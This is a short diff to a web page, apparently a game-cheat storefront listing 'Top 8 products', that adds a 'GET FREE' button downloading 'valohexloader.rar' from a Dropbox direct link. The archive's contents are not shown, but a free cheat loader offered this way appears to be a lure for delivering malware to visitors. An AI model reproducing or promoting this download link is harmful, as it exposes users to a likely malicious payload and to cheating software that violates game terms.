--- a/index.htm
+++ b/index.htm
@@ -99,7 +99,7 @@
             <h1>Top 8 products</h1>
             <h2>The most popular products</h2>
         </div>
-        <form class="catalog-block section" <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" download></a>
+       <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
             <div class="catalog-block__item">
                 <div>
                     <img src="fortnite.svg" alt="" class="catalog-block__img">
